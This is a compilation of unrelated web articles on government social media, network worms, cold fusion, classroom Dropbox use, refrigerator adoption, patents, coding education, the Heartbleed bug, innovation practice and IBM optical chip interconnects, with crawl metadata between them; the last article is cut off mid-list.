Social media is here to stay. There is no question about that, especially after Facebook reached 1 billion users and Twitter surpassed the 500 million-account mark. What is less clear, however, is how government organizations can respond to the changing communication demands of citizens who want government to use social media in a meaningful, interactive and engaging fashion. Agencies face a tough challenge: Citizens demand participation and responsiveness via social media – otherwise they complain or even mock government. But organizational missions and standard operating procedures do not allow for the fast and furious back-and-forth conversations on social networking sites. Instead, they mostly see social media as an additional channel for providing information to an audience that prefers to receive news and updates in a newsfeed. After all, government organizations are not in the business of competing for followers, fans, or to create peaks and spikes in their online communication. They are also not looking for volunteers, donors, or new customers whose interest they most spark over and over again to keep them coming back and buying their products. In general, government missions are much simpler and focus on providing a trustworthy public service upon which citizens can rely. The existing information and communication paradigm is highly hierarchical with standard operating procedures that don’t necessarily support the 140-character news cycle. Instead, blog posts, Facebook and Twitter updates have to be carefully crafted to avoid confusion, rumors, and misinformation. There is rarely an update that goes out without revisions and explicit approval after carefully considering the potential impact or consequences. In this risk-averse communication environment, social media constitutes a departure from the existing standards. Agencies' current approach to using social media focuses on broadcasting pre-existing information. They don't use social media channels to replace traditional media, instead they add social media channels to the mix and to share content that is also available through other channels, such as websites or mailings. Rarely do agencies and departments venture out to actively interact and engage in a conversational style in their newsfeeds on social media. A colloquial tone, sarcasm or jokes -- the Internet’s fuel -- can be misinterpreted or may even lead to misunderstandings. Many social media innovations develop as government officials experiment with different tactics, gain more experience, learn what tactics work and what should be avoided in the future. In this new problem space, in which regulations and rules follow the changes in observed online behavior of citizens, it is necessary to create functions and standard operating procedures that help government agencies interact online. GSA has taken a first step and provides guidance on HowTo.gov: The social media registry was launched earlier this year. The tool allows government users to register their official social media accounts, so that journalists and researchers can verify their authenticity. This increases confidence in the nature of the account. Similarly, internal workflows for crafting, reviewing, revising, and scheduling social media messages need to be designed to reduce the risks associated with the professional use of social media. An example is the recently launched “Measured Voice” social media workflow tool. Jed Sundwall, who presented the tool at the “Code for America Summit” in San Francisco in October, describes measured voice: “Government needs to be thoughtful about their social media postings. Agencies can’t post in real time answers to Facebook’s ‘What is happening?’. Instead, they have to be measured, reliable and accessible. They don't have to draw attention to themselves.” Sundwall, a contractor working on USA.gov and gobiernoUSA.gov, noticed early on that government agencies need a tool to organize their collaborative workflow in a distraction free environment to craft social media messages. The “Measured Voice” platform allows editorial teams to go back and forth during the editing process. Each team can define different roles: For example, writers craft the initial message, editors then rewrite and approve before the final messages are posted to an agency’s social media platform. The platform -- kept simple outside of Facebook and Twitter to avoid distractions -- helps to schedule updates: A feature that is especially important to avoid distractions from other important tasks government has to perform, for example emergency management situations or face-to-face interactions with citizens: Source: Screenshot provided by Jed Sundwall, Measured Voice Social media updates – fit into 140 characters on Twitter, or a few lines on Facebook -- absorb more time than a press release that allows more space for longer explanations. Sundwall points to a recent FBI update on Twitter that was carefully crafted and provided all the necessary information to diffuse the rumor that computers were stolen: As citizens and government experts become more social media savvy they will focus their activities more on networking opportunities that citizens demand and social media platforms support. Government organizations will also invest more in understanding if they are truly reaching the right audiences. Measuring the impact of social media interactions is therefore a core task that every agency should carefully consider. All social media interactions need to serve one purpose: to fulfill the mission of the organization. Only if online interactions are designed to support the mission will they provide both tangible and intangible benefits for government and its diverse audiences. Government agencies are just now starting to think about metrics that go beyond the quantitatively measurable insights, such as the number of retweets a Twitter update receives, or the number of Facebook comments citizens are willing to leave. There is, however, more: Social media engagement can be measured on different levels of an engagement scale. - The number of retweets a Twitter update receives is an important indicator of short-term attention paid to a specific update or event and are mostly context-relevant. - The number of followers and “likes” can indicate long-term community building and the degree to which citizens will actively follow updates -- an indication of continuing interest in government updates. - Leaving comments or actively asking questions shows even more engagement – and at times even concern for mission-related issues. Attracting too much attention, however, is not in the interest of most agencies (except emergency management agencies that are involved in ongoing disaster relief and prevention). Instead, for most agencies a continuous attention curve without many spikes and peaks is the best indicator that they are providing a reliable information flow to their audiences. As Sundwall notes “Government agencies are not out to advertise for ‘The best driver’s license in town’-attraction and don’t need to draw attention to their operations.” Measured voice therefore looks at the 100-message average in attention and provides feedback to its users in the form of smileys. But don’t make them smile too much; there might be too much good or bad press waiting for you! Metrics have become an invaluable source of real-time information for government -- when they measure the right type of engagement. Moreover, measuring for the sake of data accumulation will not help social media managers make their case. Instead, data needs to be carefully interpreted. Based on the insights government agencies should adjust their social media tactics. Government users can sign up for the private beta of Measured Voice at http://measuredvoice.com/govbeta.
<urn:uuid:c79c3e99-71af-4a72-839c-fb50b01f1163>
CC-MAIN-2017-09
http://www.nextgov.com/technology-news/tech-insider/2012/10/government-finding-measured-voice-social-media/58923/?oref=ng-previouspost
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00408-ip-10-171-10-108.ec2.internal.warc.gz
en
0.932744
1,465
2.78125
3
Primer: Network WormBy Kevin Fogarty | Posted 2005-01-13 Email Print How a network worm infects your computers. Isn't this just a regular worm? Yes, but there is more than one meaning for "regular."E-mail worms and viruses are designed to spread by using the e-mail system itself as a carrier. A network worm is more insidious. It might arrive via e-mail, but could also slip in attached to files in a portable hard drive, a flash-memory stick, a PDA or, increasingly, a cell phone. Why the distinction? Because it's possible to screen out most, if not all, e-mail worms and viruses using virus scanners at the firewall or on the e-mail servers. But network worms can come in via pathways that become more numerous with every advance in mobile computing, wireless networks and smart phones. Many companies aren't sufficiently aggressive about virus screening inside the firewall. So network worms not only have more ways to get into a corporate network, but once they're in, they're more likely to be free to operate uninterrupted. How does a network worm attack? Most simply copy themselves to every computer with which the host computer can share data. Most Windows networks allow machines within defined subgroups to exchange data freely, making it easier for a worm to propagate itself. Some worms can also lodge in the startup folder of a networked computer, launch when that computer is restarted and reinfect a network that may have already been cleaned out. A worm that lodges in a server can infect every user who logs on to that server. How can it affect cell phones? Russian cybersecurity firm Kaspersky Labs recently identified a network worm called Cabir that can infect a cell phone connected to the Symbian network by posing as a security utility. The worm can change the phone's operating system so it is launched every time the phone is turned on, then propagate itself to other phones via Bluetooth wireless connections. No infections have been reported so far. How do you fix infected computers? Manually, by shutting down the network and going to each infected computer to delete the offending files, then erasing the System Restore data to make sure it won't reinfect a cleaned machine. Or buy a sophisticated virus-scanning application that will sit on each computer and server and clean it of anything that resembles worm or virus code. What's the solution? Pretty obvious: Buy a good enterprise virus-scanning utility that will monitor activity inside your network as well as data coming in through the firewall. Once they've cleaned out an existing infection, virus scanners continue to watch the network for other threats. Make sure you set all machines to download the most recent worm and virus filters automatically.
<urn:uuid:30c84459-17b5-431b-9991-7f518dcf40bf>
CC-MAIN-2017-09
http://www.baselinemag.com/it-management/Primer-Network-Worm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00584-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946263
558
3.140625
3
Just over a year ago I wrote about something that was incredibly exciting: A commercial cold fusion power generation system. Assuming it worked as claimed, the cold fusion power generation system would herald huge changes in not only the energy industry, but pretty much every aspect of the global economy. In IT, practical cold fusion generators could, in theory, power entire data centers for next to no cost and provide power in locations far from the grid. And the existing power grid would, itself, be potentially obsoleted by fusion power generation. As for the impact on transportation ... imagine a car that could be driven from coast to coast several times without refueling for a few cents! That's the promise of cold fusion power. Note that cold fusion is often termed "Low Energy Nuclear Reaction" (LENR) these days, but I'll stick with cold fusion for this article. Before I update you on where we've got to in this story, let me first explain the background for those of you who might not be up on the story. Those of you who are "au fait" may care to skip ahead. The generation of energy by fusion is based on the theory that if you can persuade the nuclei of atoms to "fuse" together such that a new, heavier nucleus is formed you will generate energy ... a lot of energy. The reason for this output is that some proportion of the mass involved in fusion is converted to energy. Now, there are two ways, at least in theory, to achieve fusion. The most publicized and the technique with vastly more research dollars attached to it is "hot" fusion. Hot fusion attempts to emulate the conditions found in stars and so involves temperatures and pressures that are simply mind boggling. Hot fusion is the goal of projects such as the National Ignition Facility which, along with the likes of the Large Hadron Collider, are fine examples of "big science." The NIF has cost, so far, in excess of $3.54 billion (the LHC is even more spendy, with a price tag of "$9bn ... as of Jun 2010". Hot fusion is, if you're a geek, sexy. It involves enormous machines the size of houses, enough power to run a large city, and swarms of lab-coated acolytes to prepare and run the equipment which, to date, has completely failed to generate more power than is put into it, which is the goal (called "over unity"). Cold fusion, on the other hand, is theoretically, fusion that can occur at "normal" temperatures (i.e. room temperature ... although I guess where you set your thermostat makes that a little vague) and "normal" pressures. The concept of cold fusion goes back to the 1920s, but the general public really only became aware of the idea in the late 1980s when two respected electrochemists, Martin Fleischmann of the University of Southampton and Stanley Pons of the University of Utah, announced they had detected "anomalous heat production" in a laboratory setup orders of magnitude simpler than the equipment used by today's hot fusion researchers. Alas, the results of Fleischmann and Pons (left in photo) experiment proved very difficult to replicate and the entire cold fusion field fell into disrepute. Moreover, those who gave the concept of cold fusion any credence after the discrediting of Fleischmann and Pons, were ridiculed and ostracized. Even being interested in cold fusion could potentially end an academic science career. So, for the last two decades, research into cold fusion has been the province of a handful of maverick researchers. And thus we come to last year's Backspin column on cold fusion. At that time, an Italian inventor by the name of Andrea Rossi had been slowly gathering attention for a device he called the "E-Cat" (short for Energy Catalyzer). How the E-Cat works has never been revealed and, despite the involvement of several respected scientists, the question of whether the E-Cat really functions as claimed has yet to be resolved. On Oct. 28 last year Rossi held a demonstration in Bologna, Italy, of a 1 megawatt plant, but due to unexplained problems, the power output was only half that, and the fact that a running half-megawatt generator was connected to the E-Cat setup for the entire time and that no one was allowed to inspect the setup made the entire event totally inconclusive. Since then Rossi has made numerous announcements about significant technological advances and pricing of commercial products, but it's all still "jam tomorrow" (an expression for a never-fulfilled promise from Lewis Carroll's Through the looking glass. Rossi now has as many critics as he does believers and has been repeatedly accused of being a fraud and a con man. Even so, despite this negative press, he still claims to be moving forward. He recently held a meeting of his worldwide licensees in Zurich, Switzerland, which indicated that his company, Leonardo Corporation, has, in fact, developed a surprising level of commercial credibility without a demonstrably provable product. Over this same period a number of other companies have announced plans to build and sell commercial cold fusion products but, to date, there's nothing you can buy from Rossi or anyone else. In fact, no cold fusion system has been proven to work at a level that could be called practical or even verifiably over unity. One of the more encouraging tests of a cold fusion solution was recently conducted by Defkalion, a Greek company. The test was witnessed by a respected scientist, Michael A. Nelson, and seemed to show that excess heat was being produced, albeit with the caveat that a lot of additional testing would be required to confirm the results. So, the big question is still whether there is such a thing as cold fusion that generates more power than is input, or whether it is due to some other more conventional chemical process. This has become a matter of huge and often heated debate. A recent paper, unpublished until now, by Dr. Kirk L. Shanahan, of the Savannah River National Laboratory, titled "A Realistic Examination of Cold Fusion Claims 24 Years Later," is heavy reading but well worth it for its highly critical and detailed analysis of the reality of cold fusion. Dr. Shanahan's conclusion is not in favor of cold fusion: "The case for cold fusion (or 'LENR') stands as unproven today. That fact will remain for all time. If tomorrow, someone discovers the reproducible formula for generating low energy nuclear reactions ... that fact will not change. The failure of some scientists to obtain [cold fusion] does not prove [cold fusion] does not occur, because their work can always be criticized as being inadequate. Thus, the possibility that cold fusion exists will always be open. The only thing that science can do is show how to reproducibly get an effect. Therefore, it is likely that claims to have discovered the way to get LENRs will persist for a long time. However, there is a big difference between claiming (or asserting) something, and proving it." That really underlines what the difference is between cold fusion fan boys and completely believe in its existence, and those who remain skeptical and demand proof in the form of useful technology, by which I mean a technology that delivers real, valuable commercial results. This is something that no one -- not Rossi's Leonardo Corporation, not Defkalion, nor any of the other players in the market -- has yet managed to do. So, whether something that might or might not be cold fusion exists and is useful in practical terms isn't yet a dead issue, but as of now, a year later, it's all still jam tomorrow. Read more about data center in Network World's Data Center section. This story, "Cold Fusion a year later" was originally published by Network World.
<urn:uuid:514123ae-78c5-4945-8387-813e8a98a246>
CC-MAIN-2017-09
http://www.itworld.com/article/2719327/data-center/cold-fusion-a-year-later.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00584-ip-10-171-10-108.ec2.internal.warc.gz
en
0.967341
1,627
3.21875
3
Dropbox In The Classroom: 4 Great UsesDropbox cloud-based service does more than basic storage jobs for educators, with no IT help required. 12 Open Educational Resources: From Khan to MIT (click image for slideshow) arrived on the scene in the fall of 2009, it was aimed at consumers. But today, some of Dropbox's 100 million-plus users worldwide are students and teachers, who use the Web storage and file synchronization service in a variety of ways. Because it is a browser-accessible Web service, Dropbox needs little in the way of IT intervention, and can be used by students on campus and off. And because it offers clients for Windows, Mac and Linux -- as well as Android, iOS and BlackBerry smartphones -- any student can use Dropbox, regardless of device. Here are four great uses for Dropbox in the classroom. 1. Sharing Stored Files. In the early days, some educators probably turned to Dropbox simply because their school's own networking setup lacked such a feature. Anecdotal reports suggest that schools now are sanctioning the use of cloud services like Dropbox. [ What's the latest and greatest in Dropbox? Read Dropbox 2.0.0 Pretties Up the Menu. ] Last year, Dropbox launched a program called Space Race, offering people with an .edu email address an extra 3 GB of storage -- on top of the 2 GB of storage all users get. At this writing, it is not clear if Dropbox will offer Space Race again this year. 2. Overcoming Email Limitations. Over-size attachments, such as large PowerPoint files and videos, that never reach their intended recipient because the email program chokes on the file, is a common complaint of email users. Dropbox essentially solves this problem by bypassing email. 3. Turning In Homework. In its simplest application, Dropbox can be as used a common filing cabinet through which teachers can provide documents, such as homework assignments and handouts, and media files for the entire class. But another popular use goes in the opposite direction, from students to teachers. Using Dropbox as a homework drop has the added benefit of providing, by default, a time-stamp for these submissions. Of course, students can share Dropbox folders with each other too, and so collaborate on joint assignments. Happily, the free version of Dropbox saves a history of all deleted and earlier versions of files for 30 days. Paid Dropbox Pro accounts have a feature called Packrat that saves file history indefinitely. 4. Easy Saves From Popular Apps. Quite a number of popular productivity and educational applications now feature a Dropbox "sync" option. Evernote, for example, has a "save to Dropbox" option. Other popular education apps with Dropbox integration include: Notability, iThoughtsHD and Ghostwriter Notes. A free Dropbox account includes 2 GB of space. Users can earn more free space in a variety of ways. Also, more storage can be purchased via monthly or annual plans. For institutions needing even more storage, there is Dropbox for Teams, which adds a number of advanced account security and management options, as well as unlimited storage. Pricing for Dropbox for Teams starts at $795 for up to 250 licenses. InformationWeek's March Must Reads is a compendium of our best recent coverage on collaboration. This Must Reads: Collaboration issue looks at how collaboration tools solve real problems, the potential for unified communications to expand collaboration outside your company, where the cloud fits in and more. (Free with registration.)
<urn:uuid:5a6a5eba-81f0-4224-908a-e56f159cc87f>
CC-MAIN-2017-09
http://www.darkreading.com/attacks-and-breaches/dropbox-in-the-classroom-4-great-uses/d/d-id/1109359?cid=sbx_bigdata_related_video_mobility_big_data&itc=sbx_bigdata_related_video_mobility_big_data
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00284-ip-10-171-10-108.ec2.internal.warc.gz
en
0.930021
723
2.609375
3
Refrigerators took a long time to become commonplace The first household refrigerator powered by electricity was called the Domelre, a name derived from “domestic electric refrigerator.” Chicago inventor Fred Wolf conceived the appliance as an improvement on the incumbent icebox that was a familiar fixture in turn-of-the-century homes. Buyers would mount the unit atop their iceboxes, where it kept select food items cooler for longer than its underlying companion. The fact that the 1913 Domelre offered only a modest improvement to an existing appliance was one reason for a relatively cool reception. Another was its cost. The Domelre’s price of $900, at the time equal to 7 percent of the average U.S. household’s income, put it out of reach for most people. Even a more advanced successor, a self-contained unit produced by the Detroit-based Guardian Refrigerator Co., failed to gain traction. Two years after the first Guardian was built, according to a history of refrigeration maintained by Wright State University, the company had produced fewer than 40 units. Still, the concept of mechanical refrigeration was intriguing. The prevailing approaches for acquiring and maintaining food – daily visits to the market, morning deliveries from the milkman and the hauling around of heavy ice blocks – cried for improvement. Or so believed W.C. Durant, the president of General Motors. He bought the Guardian Refrigerator Co. in 1918, renamed it Frigidaire Corp., and replaced Guardian’s laborious, manual production process with the same sort of mass production techniques GM had applied to automobiles. GM wasn’t the only big believer. By the early 1920s, Detroit’s Kelvinator and General Electric Co. were also building refrigerators, convinced that Americans – or at least wealthy Americans – would gladly discard their iceboxes. Yet for all of its revolutionary qualities, mechanical refrigeration was no overnight sensation. It took roughly 30 years after the introduction of Wolf’s Domelre for refrigerators to reach half of U.S. homes. Even after applying a more charitable starting point – the 1918 introduction of GM’s Frigidaire – it still took 25 years for the refrigerator to reach the 50 percent penetration mark. Refrigerators didn’t hit 70 percent penetration until the early 1950s, more than 30 years after their commercial debut. One factor contributing to the prolonged ascension of household refrigeration was price. For much of its early history, the household refrigerator we now take for granted was affordable only for wealthy families. In 1924, GM’s $1,000 Frigidaire engulfed nearly 8 percent of an average family’s annual income. Today, Best Buy sells a $359 entry-level refrigerator that costs less than 1 percent of what an average U.S. household earns. There are numerous contributors to adoption rates associated with modern technologies, but as Federal Reserve Bank economist W. Michael Cox has observed, one of the most important is the relationship between costs and earnings. In 1984, the average U.S. worker had to put in 435 hours to earn enough money to buy a personal computer – one reason hardly anybody did. Today, about 25 hours of work at the average wage will do it. That has helped boost household computer penetration to 80 percent. The same dynamics affect video technologies. Easy affordability was one reason the DVD player became the champion of video technology adoption, achieving 70 percent penetration just six years after its commercial introduction in 1998. At less than $100 for many models, DVD players are affordable to almost anyone. The same can’t be said about the latest rage in video: 3-D. The least-expensive 3-D TV sets are priced at close to $2,000, more than what the average household spends on clothing in a year. Worse, 3-D sets are coming to market smack in the middle of an existing upgrade cycle for HD sets. History tells us that if 3-D is to achieve mass-market appeal, it will need to deliver more than stunning visual experiences. As compelling as those may be, they’re really just incremental enhancements to a pretty good TV experience already available through digitally connected HD sets. To really take off, 3-D video technology needs to do what refrigerators did: chill out on the cost. Addendum: My November/December 2009 column credited Jones Intercable of Augusta, Ga., with launching one of the first fiber-optic transmission networks for cable TV in the late 1980s. Equal billing should have gone to Time Warner Cable’s Oceanic Cablevision in Honolulu, which activated a fiber supertrunk in 1988. Thanks and “Aloha” to Oceanic Time Warner Cable vice president of engineering Michael Goodish for the clarification.
<urn:uuid:9495abb8-3675-4d4f-bc82-c09f67345201>
CC-MAIN-2017-09
https://www.cedmagazine.com/article/2010/01/memory-lane-coolest-technology-ever
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00456-ip-10-171-10-108.ec2.internal.warc.gz
en
0.956979
992
2.9375
3
The biggest recent splash is the Apple patent suit against some of Samsung’s Android devices. Turn on the news, read the newspaper, pick up your smartphone, and what do you see? Presidential politics and patent suits are there nonstop. I refuse to comment on the former, so that leaves the latter. While I have been serving as an expert witness in patent suits since 1994 and have picked up a lot of “layman’s knowledge,” I am not an attorney. I can’t give legal opinions. And patent law is constantly changing – sometimes by acts of Congress, sometimes due to new interpretations by courts of existing laws. So you need to engage a good patent attorney for an up-to-date opinion on serious matters. The U.S. Constitution establishes patents in Article I, the enumerated powers of Congress, Section 8: “The Congress shall have power … to promote the progress of science and useful arts, by securing for limited times to authors and inventors the exclusive right to their respective writings and discoveries.” Given that this is an election year, it would be a good idea to read the U.S. Constitution. Article I, Section 8 gives Congress the power to establish patent and copyright laws. Because it’s a constitutional issue, patent cases are tried in federal court and can be appealed all the way to the Supreme Court. A patent is the right to exclude someone from making, selling or using a patented invention. Yes, even using! So if you own a device that has been found to infringe a patent, you infringe the patent just by using the device. This extends to importing, offering for sale, and even suggesting others do these things under certain circumstances. A patent is a deal between an inventor and society that grants a monopoly for a limited period of time for practicing the invention of the patent in exchange for a clear and complete description of how the invention works, so that anyone can legally practice the invention after the patent expires. The length of time is set by Congress and can be changed. It is currently 20 years from the date the patent is filed. The “right to exclude” is enforced by bringing a lawsuit. If a patent owner is unwilling to bring a lawsuit, the patent is useless. The government does not enforce the patent, a court of law considers the accusation of infringement, and a jury makes a determination of whether infringement takes place and determines how to cure the inequity. As a practical matter, bringing an infringement suit is very expensive. There is no point in doing this unless it can be proven that the patent holder suffered significant “damages” by the infringer. To be patentable, an invention must be useful, novel and non-obvious. Useful means it must work. Novel means it hasn’t been invented before. And non-obvious means that a practitioner of ordinary skill must find it to not be an obvious combination of existing elements. Two broad categories of patents are “utility patents” and “design patents.” A utility patent covers either an apparatus or a method of doing something (or both). A design patent covers the physical appearance of a device. Engineers are generally more concerned about utility patents, and product designers and artists focus on design patents. Perhaps the biggest recent splash is the Apple patent suit against some of Samsung’s Android devices running Google software. The suit was tried in the U.S. District Court for the Northern District of California. It was a jury trial. The jury took surprisingly little time to issue its guilty verdict. The jury determined that the accused Samsung devices infringed three utility patents: 7,469,381, 7,844,915 and 7,864,163. The jury also found that Samsung’s accused devices infringed some design patents. All accused devices infringed D604,305, while some accused devices infringed D618,677 and D593,087. But no accused Samsung products infringed D504,889. Because a patent must be a teaching document, well-written patents (not all of them are) can be used as an educational tool. A good patent describes the current state of the art (yes, the proper term is “art”), lists what is deficient about the current situation and briefly explains how the invention solves problems in the state of the art. Then the patent must describe, in clear detail, how to practice the invention. In years past, a copy of a patent had to be ordered from the U.S. Patent and Trademark Office or a service providing copies of patents for a fee. The USPTO maintained sets of copies in a number of libraries. If you needed the patent copy quickly, you paid extra. Then fax machines facilitated faster access. Today, copies can be downloaded from the USPTO or in PDF form from Google Patents at no charge. I would encourage downloading a couple of these patents, both the utility and design patents, to get a feel for how they are constructed. I would recommend the Nolo Press book “Patent it Yourself” by David Pressman. But I don’t recommend patenting your invention yourself! The book is a great introduction to the process, but you need a professional to protect your rights.
<urn:uuid:5f1b2cc1-cfb3-4a49-85a5-0c213c62094f>
CC-MAIN-2017-09
https://www.cedmagazine.com/article/2012/09/cicioras-corner-patent-wars
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00456-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938976
1,100
2.53125
3
Two candidates apply for a software development position: One has a degree in computer science from a prestigious school. The other is self-taught with several years' experience under his belt. Which one one gets the job? Of course, there's no definitive answer to this question, but it's one that CIO's are increasingly going to have to think about. That's because more and more software developers – and very skilled and competent ones at that – are entering the job market without any degree-level training. By contrast, around 73 percent of Java and C# devs have computer science degrees, and about 65 percent of C and C++ devs. The survey found that Massively Open Online Courses (MOOCs) offered by the likes of Coursera, Udacity and Khan Academy are playing an important role in helping would-be developers develop skills in Swift and other languages such as Python and Ruby. Many MOOCs also offer courses in iOS and Android app development, Web development and data science. What's notable about developers who have studied a language through a MOOC is that many of them already have bachelor's degrees of some sort or another, and many were already software developers. "The typical Coursera learner taking a programming or other technology course has a bachelor’s degree, is currently employed, and is between 22 and 35 years of age," says Kevin Mills, a Coursera technology vertical manager. "Among these learners, it is about an even split between those looking to begin a new career in programming versus those seeking to advance their existing programming skills." That's echoed by Oliver Cameron, vice president of engineering and product at Udacity. He says the company sees a lot of programmers come to Udacity to learn new programming languages or gain new skills in languages they already work with. "But we also see a lot of people in nontechnical fields like event management or art or music learning to code with Udacity and making the leap to a full-time technical job," he adds. As an alternative to MOOCs, some would-be professional coders are also turning to intensive "coding boot camps" which often last just a week or two, focusing on specific coding skills. The idea of employing a developer who is self-taught or who has attended a boot camp or online course may be alarming – after all, who would want to consult a physician who hadn't been through medical school? Jan-Martin Lowendahl, an education analyst at Gartner, points out that computer science courses teach much more than specific language skills. "At university in a computer science course the emphasis is on learning skills like programming logic, not particular languages. You get much more depth on a computer science degree course." The flip side of this is that there is great inertia when it come to the actual languages that are taught – many still teach FORTRAN, he adds. There's an argument to be made, however, that teaching FORTRAN is a little like teaching Latin to language students: Studying it may not be useful in its own right, but it brings a deep and broad understanding of the discipline as a whole, and makes learning to code in other languages more efficient. Who’s got time (and money) for a full degree? That may be true, but studying for a computer science degree is a luxury that many people can't afford – both financially, and in terms of time – particularly if they already have a bachelor's degree. "Many people simply don't have the time to go to [college] to learn new skills, and there is a question mark over the value of a formal diploma in a fast-changing world," says Lowendahl. "At the same time, software development has always been a realm that is suited to self-teaching and learning by doing. People who are drawn to software development tend to be good self-learners." [Related: 5 tips to avoid scaring away top tech talent] Daun Davids is a good example of this type of software developer. She earned a bachelor's degree in computer science and worked as a software engineer for many years before taking time off to homeschool her children and finish her master's degree in Computational Science and Robotics. When this was finished, she decided that she was interested in resuming her programming career as an Android developer. "I was trying to learn Android development on my own but most of the information I found was very basic or outdated. Then I saw that Coursera was starting a Mobile Cloud Computing with Android specialization so I signed up," she says. The course took a year to complete and Davids says she then found work almost immediately as a freelance Android developer. Aaron Pollack is another example. While working doing tech support for a startup he began learning Python in his spare time – through self-study, using a tutor he found on Craigslist, on two six-week courses offered by Coursera, and at a coding boot camp. "Doing the algorithms classes on Coursera made me a stronger applicant for the bootcamp and for jobs afterwards," he says. "But I really learned programming by hacking on different apps, going to events and meetups, and bothering as many people as I could about technology." While attending computer science courses at a college may cost tens of thousands of dollars per year, anyone can learn to code for the price of a text book, or for free, by accessing online courses offered by MOOCs. For a more formal qualification, MOOCs offer qualifications for far less than typical university fees. For example, Udacity offer courses leading to a "nanodegree" qualification for $199 per month, with half refunded if the course is completed in under a year, or a course with a guaranteed job within six months of graduation – or a full refund – for $299. So ... degree, or no degree? So going back to the original question, which is more attractive: someone with a computer science degree or someone with more quickly acquired but more language specific coding skills? "You certainly get more depth of learning with a computer science degree, but shorter courses have an emphasis on more current skills," says Gartner's Lowendahl. "When it comes to productivity and ingenuity, you can get that from either type of course. At the end of the day it comes down to a person's competence and grit," he says. This story, "Who needs a computer science degree these days?" was originally published by CIO.
<urn:uuid:b2dbcb41-32dd-4d48-bc6c-d32a689cc640>
CC-MAIN-2017-09
http://www.itnews.com/article/3025349/careers-staffing/who-needs-a-computer-science-degree-these-days.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.972914
1,353
2.953125
3
Lesson 1: Workspace, Project and Sessions This lesson will teach you how to create/use a workspace, a project and a session. This part is mandatory to be able to use Watobo Watobo organizes the projects as follows: - Workspace: Physical path where project files will be saved. - Project: Projects are included in a workspace and contain sessions. - Session : Sessions are contained in a project. Either click on the [+] icon or select File > New/Open from the menu. Then fill in the following screens:
<urn:uuid:23aefdcf-051b-430b-80ab-31e71c1fb0fa>
CC-MAIN-2017-09
https://www.aldeid.com/wiki/Watobo/Usage/Project-workspace-session
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00508-ip-10-171-10-108.ec2.internal.warc.gz
en
0.784484
116
2.703125
3
In the wake of widespread media coverage of the Internet security debacle known as the Heartbleed bug, many readers are understandably anxious to know what they can do to protect themselves. Here’s a short primer. The Heartbleed bug concerns a security vulnerability in a component of recent versions of OpenSSL, a technology that a huge chunk of the Internet’s Web sites rely upon to secure the traffic, passwords and other sensitive information transmitted to and from users and visitors. Around the same time that this severe flaw became public knowledge, a tool was released online that allowed anyone on the Internet to force Web site servers that were running vulnerable versions of OpenSSL to dump the most recent chunk of data processed by those servers. That chunk of data might include usernames and passwords, re-usable browser cookies, or even the site administrator’s credentials. While the exploit only allows for small chunks of data to be dumped each time it is run, there is nothing to prevent attackers from replaying the attack over and over, all the while recording fresh data flowing through vulnerable servers. Indeed, I have seen firsthand data showing that some attackers have done just that; for example, compiling huge lists of credentials stolen from users logging in at various sites that remained vulnerable to this bug. For this reason, I believe it is a good idea for Internet users to consider changing passwords at least at sites that they visited since this bug became public (Monday morning). But it’s important that readers first make an effort to determine that the site in question is not vulnerable to this bug before changing their passwords. Here are some resources that can tell you if a site is vulnerable: Continue reading →
<urn:uuid:88c2afe4-2bc5-4b4e-90c3-51b9165c36b2>
CC-MAIN-2017-09
https://krebsonsecurity.com/tag/openssl/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00504-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947966
342
2.828125
3
Innovation is the process of inventing or introducing something new that adds value for our stakeholders (customers, employees, or shareholders). Innovation is a process of creation and execution that... Results in scalable, unique, differentiated solutions Targets existing and potential customers (both internal and external) Creates business value Is everyone’s responsibility Ideas can address a multitude of improvements and enhancements to the existing services and products. Whether these ideas result in small or big changes, they are based on business needs and create business values promoting innovation. Categories of Innovation Innovation starts from existing customer/technology (inside the box) and goes to new customer/technology (out of the box). The following is the high level flow from asking questions, generating ideas, to prioritizing, and implementing the ideas. The focus is more on Volume first and then Value. The Worst Idea Techniques Questioning Assumptions/20 Questions The Wish Technique In summary, innovation practices involve innovative teams asking provocative questions, seeking many point of views, learning from test, and moving the promising ideas forward to provide business value for the customer and organization. Remember to ask open-ended questions. Happy Ideating!
<urn:uuid:54b29789-231e-47d8-a07e-9f58b475d2e8>
CC-MAIN-2017-09
https://www.hcltech.com/blogs/engineering-and-rd-services/promoting-and-nurturing-innovation
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00028-ip-10-171-10-108.ec2.internal.warc.gz
en
0.86777
255
2.671875
3
IBM scientists announced a breakthrough today that they claim could one day lead to a completely new way of handling communication between multiple CPU cores on a single die. IBM researchers have created a modulator that's one hundred to a thousand times smaller than other prior modulators and is theoretically capable of using light pulses to transmit data between cores, rather than relying on traditional wires. Most reports have heralded this development as paving the way for supercomputers on a single chip, but at present, the technology is too big and has no supporting on-chip light source. That said, the long-term potential for such a technology is good. Chip-level optical routing would allow cores to communicate much faster than even the best wired connection (IBM estimates its nanophotonic technology would be 100 times faster) and would almost certainly eliminate any bandwidth-related bottlenecks within a single core. That might seem to be of limited use, since IBM has yet to describe a nanophotonic system for moving data between processors, but Big Blue believes that overcoming the heat generated by the use of connective wire between cores is a crucial step towards packing more cores on a single die. The process of transmitting data from core to core using IBM's optical modulator is described as follows: - An input laser is focused on the optical modulator. A shutter in the output modulator keeps the light from passing through. - The data signal to be transmitted is 